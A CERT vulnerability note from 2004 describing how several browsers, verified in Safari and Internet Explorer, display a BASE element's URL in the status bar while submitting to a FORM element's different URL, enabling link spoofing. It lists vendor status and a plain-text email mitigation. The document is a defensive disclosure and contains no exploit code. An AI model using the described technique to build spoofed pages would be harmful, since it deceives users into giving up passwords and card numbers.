search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Multiple web browsers do not properly interpret BASE and FORM elements when displaying URLs in the status bar

Vulnerability Note VU#702086

Original Release Date: 2004-11-04 | Last Revised: 2004-11-04

Overview

Multiple web browsers do not properly display the location of HTML documents in the status bar. An attacker could exploit this behavior to mislead users into revealing sensitive information.

Description

Web browsers frequently display the Uniform Resource Locator (URL) in the status bar when a user moves the cursor over links contained within the page. A vulnerability exists in the way multiple web browsers interpret HTML to determine the correct URL to display in the browser's status bar.

The Hypertext Markup Language (HTML) supports the use of the BASE and FORM elements. The BASE element is used to define the base href for the document. For instance, assume that a web developer specifies the following tag in an HTML document:

<base href="http://www.example.com">

If the web developer specifies a link to a document (e.g., index.html) without using a fully qualified URL (e.g., http://www.example.com/index.html), the URL will rely on the base href to complete the URL. The FORM element is used to define a section of the document that can have buttons, textboxes, and labels. When a user completes the form, it can then be submitted. The form's action property specifies where the data in the form is sent for processing.

When certain web browsers encounter a BASE element prior to a FORM element, they will use the BASE element's URL to display in the status bar, but access the URL specified in the FORM element when the user clicks on the link.

Note: In the case of Internet Explorer, exploitation of this vulnerability does not require Active scripting to be enabled.

Impact

An attacker could mislead a user to into believing that the URL specified in the status bar is the site that will be accessed when the user clicks on the link. However, when the user clicks on the link they will visit a site different than the URL specified in the status bar and potentially controlled by the attacker. The attacker could use additional social engineering techniques to trick the victim into disclosing sensitive information such as credit card numbers, account numbers, and passwords.

Solution

We are currently unaware of a practical solution to this problem.

Read and send email in plain text format

Outlook 2003, Outlook 2002 SP1, and Outlook 6 SP1 can be configured to view email messages in text format. Consider the security of fellow Internet users and send email in plain text format when possible. Note that reading and sending email in plain text will not necessarily prevent exploitation of this vulnerability.

Vendor Information

702086
 

Apple Computer Inc. Affected

Updated:  November 04, 2004

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does affect Safari 1.2.3 (v125.9).

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Microsoft Corporation Affected

Updated:  November 04, 2004

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability affects Internet Explorer 6.0.2900.xpsp2_sp2_rtm.040803-2158

If you have feedback, comments, or additional information about this vulnerability, please send us email.

KDE Desktop Environment Project Unknown

Updated:  November 04, 2004

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does not affect Konqueror version 3.3.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Mozilla Unknown

Updated:  November 04, 2004

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does not affect Mozilla version 1.7.3.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Opera Software Unknown

Updated:  November 04, 2004

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does not affect Opera version 7.54.

If you have feedback, comments, or additional information about this vulnerability, please send us email.


CVSS Metrics

Group Score Vector
Base
Temporal
Environmental

References

Acknowledgements

This vulnerability was reported by http-equiv.

This document was written by Will Dormann and Damon Morda.

Other Information

CVE IDs: None
Severity Metric: 0.33
Date Public: 2004-11-01
Date First Published: 2004-11-04
Date Last Updated: 2004-11-04 21:53 UTC
Document Revision: 27

Sponsored by CISA.